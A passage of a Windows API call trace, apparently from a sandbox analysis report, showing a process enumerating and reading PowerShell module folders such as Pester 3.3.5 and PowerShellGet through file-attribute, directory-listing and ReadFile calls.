(dwNewMode=0x1, lpOldMode=0x653ef8dc30) returned 1 [0224.826] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5"), fInfoLevelId=0x0, lpFileInformation=0x653ef8dd10 | out: lpFileInformation=0x653ef8dd10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dbf0) returned 1 [0224.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dc80) returned 1 [0224.826] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8d760, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0224.826] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8d990 | out: lpFindFileData=0x653ef8d990*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.827] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.827] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0224.827] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0224.827] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0224.828] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0224.828] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0224.828] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0224.828] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0224.828] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0224.828] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0224.829] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0224.829] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0224.829] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0224.829] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0224.829] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0224.830] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0224.830] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dbb0) returned 1 [0224.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db70) returned 1 [0224.830] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psd1")) returned 0xffffffff [0224.830] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psm1")) returned 0xffffffff [0224.830] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.cdxml")) returned 0xffffffff [0224.830] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.xaml")) returned 0xffffffff [0224.830] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.dll")) returned 0xffffffff [0224.831] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8d970, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0224.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.831] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x653ef8dea0 | out: lpFileInformation=0x653ef8dea0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.831] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0224.831] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8db20 | out: lpFindFileData=0x653ef8db20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.831] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.832] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0224.832] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0224.832] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.832] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0224.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de30) returned 1 [0224.832] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df10 | out: lpFileInformation=0x653ef8df10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0224.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ddf0) returned 1 [0224.833] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0224.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dbd0) returned 1 [0224.833] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6f4 [0224.833] GetFileType (hFile=0x6f4) returned 0x1 [0224.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db40) returned 1 [0224.833] GetFileType (hFile=0x6f4) returned 0x1 [0224.833] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5be48898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5be48898*, lpNumberOfBytesRead=0x653ef8dca8*=0x1000, lpOverlapped=0x0) returned 1 [0224.834] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5be48898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5be48898*, lpNumberOfBytesRead=0x653ef8dca8*=0x1000, lpOverlapped=0x0) returned 1 [0224.834] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5be48898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5be48898*, lpNumberOfBytesRead=0x653ef8dca8*=0x1000, lpOverlapped=0x0) returned 1 [0224.835] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5be48898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5be48898*, lpNumberOfBytesRead=0x653ef8dca8*=0x5e5, lpOverlapped=0x0) returned 1 [0224.835] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5be47dbd, nNumberOfBytesToRead=0x21b, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5be47dbd*, lpNumberOfBytesRead=0x653ef8dca8*=0x0, lpOverlapped=0x0) returned 1 [0224.835] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5be48898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5be48898*, lpNumberOfBytesRead=0x653ef8dca8*=0x0, lpOverlapped=0x0) returned 1 [0224.835] CloseHandle (hObject=0x6f4) returned 1 [0224.839] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0224.839] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0224.839] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0224.840] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0224.840] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0224.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.840] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x653ef8d890, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0224.840] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0x653ef8dac0 | out: lpFindFileData=0x653ef8dac0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.840] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.841] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0224.841] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0224.841] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.841] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x653ef8d890, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0224.841] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0x653ef8dac0 | out: lpFindFileData=0x653ef8dac0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.842] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.842] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0224.842] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, 